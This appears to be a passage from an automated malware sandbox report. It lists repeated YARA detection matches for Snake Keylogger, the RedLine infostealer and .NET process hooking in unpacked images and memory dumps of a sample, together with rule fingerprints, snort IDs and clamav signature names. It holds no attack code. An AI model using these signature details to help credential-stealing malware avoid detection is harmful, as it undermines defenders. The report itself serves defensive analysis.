            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.1.yihfsboC.pif.400000.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.400000.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.1.yihfsboC.pif.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.EPTMAcgvNZ.exe.21ef13d8.11.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.1.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.1.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.EPTMAcgvNZ.exe.21a70ae8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
